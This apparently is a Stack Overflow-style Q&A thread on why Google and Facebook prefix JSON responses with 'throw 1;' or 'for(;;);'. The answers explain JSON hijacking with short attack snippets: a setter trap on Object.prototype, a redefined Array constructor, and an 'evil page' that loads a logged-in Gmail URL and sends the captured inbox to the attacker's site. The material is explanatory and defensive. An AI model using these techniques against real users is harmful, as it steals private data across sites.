views:

706

answers:

5

Google returns json like this:

throw 1; <dont be evil> { foo: bar}

and Facebooks ajax has json like this:

for(;;); {"error":0,"errorSummary": ""}
  • Why do they put code that would stop execution and makes invalid json?
  • How do they parse it if it's invalid and would crash if you tried to eval it?
  • Do they just remove it from the string (seems expensive)?
  • Are there any security advantages to this?

In response to it being for security purposes:

If the scraper is on another domain they would have to use a script tag to get the data because XHR won't work cross-domain. Even without the for(;;); how would the attacker get the data? It's not assigned to a variable so wouldn't it just be garbage collected because there's no references to it?

Basically to get the data cross domain they would have to do

<script src="http://target.com/json.js"&gt;&lt;/script&gt;

But even without the crash script prepended the attacker can't use any of the Json data without it being assigned to a variable that you can access globally (it isn't in these cases). The crash code effectivly does nothing because even without it they have to use server sided scripting to use the data on their site.

+5  A: 

How do they parse it if it's invalid and would crash if you tried to eval it?

It's a feature that it would crash if you tried to eval it. eval allows arbitary JavaScript code, which could be used for a cross-site scripting attack.

Do they just remove it from the string (seems expensive)?

I imagine so. Probably something like:

function parseJson(json) {
   json = json.replace("throw 1; <dont be evil>", "");
   if (/* regex to validate the JSON */) {
       return eval(json);
   } else {
       throw "XSS";
   }
}

The "don't be evil" cruft prevents developers from using eval directly instead of a more secure alternative.

dan04
It's there to prevent using `eval`. Don't try to sidestep it, use a dedicated JSON parser instead!
kibibu
This seems to be closer to the actual purpose than for preventing scraping (being that either way to scrap you need server sided scripting) +1
Chris T
@kibubu A dedicated JSON parser should throw an error on that though.
Graphain
I'd like to see that regex, if you don't mind. Hint - don't waste time trying to write it `:)`
Kobi
@Kobi Just thinking about it makes me confused, angry, and nauseous :P
Chris T
@dan04 I don't think this xss attack scenario is realistic. I don't see how this addresses "dom based xss" or even using XHR+XSS to forge requests, which was used by the "Sammy Worm".
Rook
@dan04 I knew it, this is the wrong answer. I found an explanation from a Google employee.
Rook
A: 

Just another case of superstition. I am sure someone will find a logically sounding rationalization for it.

ThomasW
Its funny that you say this, the thought crossed my mind but I think facebook and google are a bit smarter than that. The real answer has been posted.
Rook
+6  A: 

EDIT

These strings are commonly referred to as an "unparseable curft" and they are used to patch an information leakage vulnerability that affects the JSON specification. This attack is real world and a vulnerability in gmail was discovered by Jeremiah Grossman. Mozilla also believes this to be a vulnerability in the JSON specification and it has been patched in Firefox 3. However because this issue still affects other browsers this "unparseable curft" is required because it is a compatible patch.

Bobice's answer has a technical explanation of this attack and it is correct.

Rook
Now that makes a lot more sense usage wise and it explains why sites like google and facebook use it (allowing cross domain requests for gadgets, widgets and what-have-you)
Chris T
This is not the right answer, no matter who gave you the answer. The right answer, in terms comprehensiveness *and* correctness, is the one given by user bobince at the bottom. Preventing JSON output from a script from being viewed in a browser doesn't even make sense, if it has Content-Type `text/json` it would not even be opened and if it were `text/[x]html` it would be bad HTML. In no case would the browser execute it if fed as the input document. Crufting is to prevent CSRF attacks and JSON evaluation, because on an attacker's site the Object prototype could be overridden to steal data.
Jesse Dhillon
@Jesse Dhillon bobince maybe correct but his post is missing something, its not clear how the attacker is able to influence the constructor. I still think this is to protect a Cross-Domain Proxy. For now i'm siding with google.
Rook
Read http://en.wikipedia.org/wiki/CSRF. I have a site; you come to my site after logging into your JSON-heavy bank website. On my site I have defined the constructor, because it's my site. I embed a cross-domain script tag which OP thought would result in benign objects being immediately discarded, except they aren't. They're captured by my malicious constructor.
Jesse Dhillon
@Jesse Dhillon you should read my profile and i'm still skeptical.
Rook
@Jesse Dhillon You are right about the content type, but I can't write off a google employee just yet. Especially not when bobince's post is missing something. I am unsure as to how an attacker would go about levering the attack that bobince is describing.
Rook
Please pardon me if I offend you, but I find it bordering on unbelievable that someone with your background has not a) tested this out him/herself and b) does not see the truth of it a priori, c) would accept the explanation that cruft provides security if/when a user receives a JSON snippet as the input document to the browser. I'm sorry to tell you that your answer is wrong, and if you accurately represented the Google employee's response, then he/she is also wrong.
Jesse Dhillon
@Jesse Dhillon I'll admit that i'm not 100% sure about this one. I don't like bobince's answer because its not an attack scenario. You must admit that you don't have the answer ether (yet you gave me a -1). It maybe related to csrf but as it stands i fail to see how this security mechanism prevents an attacker from obtaining a csrf token or bypassing a referer check.
Rook
@Jesse Dhillon Look at this exploit that I have written (http://www.exploit-db.com/exploits/7922/). If you can tell me how this XHR attack is related to an unparseable curft, I'll accept that its CSRF related. Because the security mechanism is written in JS, I'm pretty sure is xss related.
Rook
The other answer does show how it protects it from a data leakage vulnerability. I don't know if it qualifies as CRSF but it is defiantly a vulnerability/exploit of some kind. It shows using a `<script>` tag and setters/getters to get the data. Putting a prefix like the above would stop this sort of attack. The other answer might be more correct after all
Chris T
I gave this answer a -1 because I don't believe that the reason is correct, regarding protecting Javascript from being executed if the request URL is accessed directly from the location bar. The rest of this exchange has been great though, my answer is the one I posted just recently and an elaboration of bobince's. Cheers.
Jesse Dhillon
@Chris T, Yes Bobice is correct I didn't agree at first because I wanted to see a real world attack like this one against gmail: (http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html)
Rook
Your sample exploit works because it's an XSS attack. That's the reason you would be able to decruft the response, because you've managed to get the code presented from the same domain as the target pligg site. That's different than what's going on with the proposed vulnerability here, where we are decrufting without defeating same-origin through XSS.
Jesse Dhillon
+19  A: 

Even without the for(;;); how would the attacker get the data?

Attacks are based on altering the behaviour of the built-in types, in particular Object and Array, by altering their constructor function or its prototype. Then when the targeted JSON uses a {...} or [...] construct, they'll be the attacker's own versions of those objects, with potentially-unexpected behaviour.

For example, you can hack a setter-property into Object, that would betray the values written in object literals:

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

Then when a <script> was pointed at some JSON that used that property name:

{"x": "hello"}

the value "hello" would be leaked.

The way that array and object literals cause setters to be called is controversial. Firefox removed the behaviour in version 3.5, in response to publicised attacks on high-profile web sites. However at the time of writing Safari (4) and Chrome (5) are still vulnerable to this.

Another attack that all browsers now disallow was to redefine constructor functions:

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]

And for now, IE8's implementation of properties (based on the ECMAScript Fifth Edition standard and Object.defineProperty) currently does not work on Object.prototype or Array.prototype.

But as well as protecting past browsers, it may be that extensions to JavaScript cause more potential leaks of a similar kind in future, and in that case chaff should protect against those too.

bobince
Very interesting I never thought of using setters. +1
Chris T
This is absolutely the correct answer and should have been selected for this question.
Jesse Dhillon
How does the attacker influence the constructor? How is this tainted data executed by the client?
Rook
Read about CSRF attacks.
Jesse Dhillon
+1 Yes, bobice is correct. I wanted to see a real world attack like this one against gmail: http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
Rook
+1  A: 

Consider that, after checking your GMail account, that you go visit my evil page:

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.serialize(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"&gt;&lt;/script&gt;

What will happen now is that the Javascript code that comes from Google -- which the asker thought would be benign and immediately fall out of scope -- will actually be posted to my evil site. Suppose that the URL requested in the script tag sends (because your browser will present the proper cookie, Google will correctly think that you are logged in to your inbox):

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

Now, I will be posting a serialized version of this object to my evil server. Thank you!

The way to prevent this from happening is to cruft up your JSON responses, and decruft them when you, from the same domain, can manipulate that data. If you like this answer, please accept the one posted by bobince.

Jesse Dhillon
I´m pretty sure Gmail´s auth is not only based on cookies, as that would be very, very weak as you describe here. I think they also incorperate session keys in the URL, which you page can´t just intercept.
Dykam
The problem with a site whose target audience is programmers, is that every once in a while you will encounter people who are {hope,point,use}lessly pedantic. Try this: a) It's an example of how such an attack could work, not the complete hacker's reference for carrying out attacks against Gmail, and b) as has been pointed out another answer to this question, a similar attack was demonstrated against Gmail, allowing an attacker to access a user's contact list.
Jesse Dhillon